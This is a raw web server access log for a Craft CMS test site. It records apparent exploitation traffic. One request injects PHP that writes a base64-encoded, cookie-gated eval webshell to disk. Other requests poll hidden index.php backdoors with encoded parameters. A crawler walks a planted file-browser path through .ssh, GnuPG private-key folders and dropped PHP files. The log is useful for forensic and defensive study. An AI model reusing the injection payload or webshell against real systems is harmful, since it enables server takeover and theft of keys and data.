62.164.177.242 - - [21/Aug/2025:07:13:26 -0400] "GET /order/files/e60753fe-b850-46cb-99ff-fba79c92d0e4/e60753fe-b850-46cb-99ff-fba79c92d0e4/index.php?ARRAY=7o2230223n313735353737383430352p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737343830352q6230353266303337383165386662303733386635616239373966323630626136222p2232223n226236366330633537656335333463643535666132663864386461373664386430222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p2262696r675s70617373223n2231312q33322q35362q36352q37372q38372q3235227q HTTP/2.0" 200 382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.3292.140 Safari/537.36 Edge/18.18761" "62.164.177.242" 706 0.890 "1589" "0.890" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:16:55 -0400] "GET / HTTP/2.0" 302 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" "2a0b:4141:820:88d::2" 371 0.608 "0" "0.607" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:16:55 -0400] "GET /shop/products HTTP/2.0" 200 6699 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" "2a0b:4141:820:88d::2" 383 0.606 "74727" "0.607" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:17:30 -0400] "GET /order/files/2023-07/c9b92769-9d4a-4fe2-90ce-e5c37234ab05/_350x82_crop_center-center_none/_350x82_crop_center-center_none/index.php?ARRAY=7o2230223n313735353737383634392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737353034392q3162316132343637313434383663663361383930616162633236666538613266222p2232223n226463336461343362643033393035306266373037653130333830396364643835222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p2262696r675s70617373223n2231372q33382q35342q36362q38302q38342q3134227q HTTP/2.0" 200 363 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1" "62.164.177.242" 738 0.898 "1527" "0.898" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:17:43 -0400] "GET /robots.txt HTTP/2.0" 200 88 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 275 0.002 "98" "0.002" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:17:44 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.%2Ftmp HTTP/2.0" 200 1346 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 66 0.010 "5744" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:17:47 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2Fphp.ini HTTP/2.0" 200 959 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 95 0.005 "2787" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:17:50 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2F..%2Ftmp HTTP/2.0" 200 1359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 71 0.010 "5879" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:17:53 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Fcec54a4c HTTP/2.0" 200 1482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 102 0.005 "7819" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:17:56 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2F.%2F.. HTTP/2.0" 200 1698 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 70 0.008 "17752" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:17:59 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fcreocoder HTTP/2.0" 200 1380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 94 0.007 "6365" "0.006" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:02 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Ftemplates%2Fhome HTTP/2.0" 200 1416 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 92 0.009 "6384" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:05 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fbootstrap.php HTTP/2.0" 200 1189 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 93 0.005 "3200" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:08 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fplugins%2Fcommerce-helcim HTTP/2.0" 200 1447 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 98 0.003 "7505" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:11 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fassets%2Fjs HTTP/2.0" 200 1494 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.004 "8883" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:14 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.cache%2F.. HTTP/2.0" 200 1693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 68 0.003 "17701" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:17 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fplugins%2Fassets HTTP/2.0" 200 1367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 92 0.003 "6300" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:20 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fcomposer HTTP/2.0" 200 1909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 93 0.008 "26493" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:23 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Flog%2F.. HTTP/2.0" 200 1692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 66 0.004 "17542" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:26 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fconfig%2Froutes.php HTTP/2.0" 200 1272 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 94 0.006 "3348" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:29 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fassets%2Fjs HTTP/2.0" 200 1471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 95 0.003 "8530" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:07:18:31 -0400] "GET /30a37/30a37/30a37/index.php?ARRAY=7o2230223n313735353737383731302p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737353131302q3039366239333466303039646137323862386439396564336231666165373562222p2232223n223464346661366466373461303363336165376262303338356632663062376536222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p2262696r675s70617373223n2233302q34372q35322q36342q37362q38382q3330227q HTTP/2.0" 200 337 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:74.0) Gecko/20100101 Firefox/74.0" "62.164.177.242" 615 0.841 "1062" "0.841" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:32 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fstorage%2Fcomposer-backups HTTP/2.0" 200 1744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 99 0.003 "28739" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:35 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fplugins%2Fcraft-content-buddy HTTP/2.0" 200 1565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 102 0.004 "11888" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:38 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2F..%2Fapps HTTP/2.0" 200 1345 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 72 0.003 "5892" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:41 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Ftmp%2F.. HTTP/2.0" 200 1692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 66 0.004 "17542" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:44 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fplugins%2Fcarebot HTTP/2.0" 200 1476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 93 0.004 "8437" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:47 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Fb6b51f3f HTTP/2.0" 200 1462 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 113 0.003 "6920" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:50 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.%2Fapps HTTP/2.0" 200 1336 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 66 0.003 "5757" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:53 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fphpdocumentor HTTP/2.0" 200 1432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 97 0.003 "8503" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:56 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.gnupg%2Fprivate-keys-v1.d HTTP/2.0" 200 1323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 79 0.003 "5007" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:18:59 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Fb6b51f3f HTTP/2.0" 200 1437 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.004 "6621" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:19:02 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fplugins%2Fcraftcms-bastion-agent HTTP/2.0" 200 1615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.003 "14108" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:19:05 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fplugins%2F.. HTTP/2.0" 200 1715 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 90 0.003 "19445" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:19:08 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F.%2Fcomfunctions.php HTTP/2.0" 200 3051 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.020 "8764" "0.020" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:19:08 -0400] "GET / HTTP/2.0" 302 0 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" "2a0b:4141:820:88d::2" 867 0.470 "0" "0.470" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:19:09 -0400] "GET /shop/products HTTP/2.0" 200 6702 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" "2a0b:4141:820:88d::2" 1060 0.635 "74727" "0.634" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:19:11 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.cache%2Fcomposer HTTP/2.0" 200 1425 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 72 0.004 "7703" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:19:14 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fibericode HTTP/2.0" 200 1369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 95 0.003 "6313" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:19:17 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fsymfony HTTP/2.0" 200 1857 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 93 0.005 "29620" "0.006" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:19:17 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 500 174694 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" "2a0b:4141:820:88d::2" 1225 0.507 "174694" "0.504" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:19:20 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fautoload.php HTTP/2.0" 200 1324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 96 0.003 "3497" "0.004" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:19:26 -0400] "GET /index.php?p=admin/dashboard&a=<?=file_put_contents(\x22c057546adf31.php\x22,base64_decode(\x22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K\x22));die();?> HTTP/2.0" 302 0 "-" "PycURL/7.43.0.1 libcurl/7.86.0 OpenSSL/1.1.1 zlib/1.2.11 c-ares/1.18.1 libidn2/2.0.4 librtmp/2.3" "2a0b:4141:820:88d::2" 759 0.460 "0" "0.460" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:19:26 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F70f7c HTTP/2.0" 200 1435 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 331 0.003 "7434" "0.004" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:19:27 -0400] "GET /index.php?p=admin/dashboard HTTP/2.0" 302 0 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" "2a0b:4141:820:88d::2" 783 0.455 "0" "0.455" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:19:28 -0400] "GET /admin/login HTTP/2.0" 200 16968 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" "2a0b:4141:820:88d::2" 952 0.593 "59172" "0.593" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:19:29 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.%2F.. HTTP/2.0" 200 1095 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 66 0.004 "3088" "0.003" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:19:37 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 200 126 "https://test.newsite.space/admin/login" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" "2a0b:4141:820:88d::2" 1352 0.434 "157" "0.433" "test.newsite.space"
2a0b:4141:820:88d::2 - - [21/Aug/2025:07:19:41 -0400] "GET /c057546adf31.php HTTP/2.0" 403 449 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" "2a0b:4141:820:88d::2" 1078 0.001 "859" "0.002" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:20:57 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fsetasign HTTP/2.0" 200 1364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 329 0.007 "6304" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:00 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Fb0ac7de7 HTTP/2.0" 200 1442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 104 0.004 "6678" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:03 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2F..%2F.gnupg HTTP/2.0" 200 1356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 73 0.003 "5908" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F30f2c67a HTTP/2.0" 200 1406 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.003 "7553" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:09 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F10bddd743f.php HTTP/2.0" 200 19579 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.004 "28224" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2F92d27eb41b.php HTTP/2.0" 200 19602 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.005 "28432" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:15 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2F92d27eb41b.php HTTP/2.0" 200 19606 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.003 "28433" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Frun%2Fcraft4-newsite-space.php-fpm.sock HTTP/2.0" 200 1117 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 88 0.003 "3222" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Fc1b7baf0 HTTP/2.0" 200 1446 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.003 "6678" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.%2F.ssh HTTP/2.0" 200 1379 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 66 0.004 "5801" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Fbb245e8e HTTP/2.0" 200 1459 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.003 "7726" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F92fd50c HTTP/2.0" 200 1499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.004 "8999" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.%2F.bash_logout HTTP/2.0" 200 999 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 71 0.003 "2628" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:36 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2Frobots.txt HTTP/2.0" 200 995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.002 "3024" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:39 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2Frobots.txt HTTP/2.0" 200 992 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.003 "3025" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Fd842585c HTTP/2.0" 200 1453 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.003 "6933" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:07:21:45 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F92d27eb41b.php HTTP/2.0" 200 19579 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 100 0.003 "28224" "0.004" "test.newsite.space"
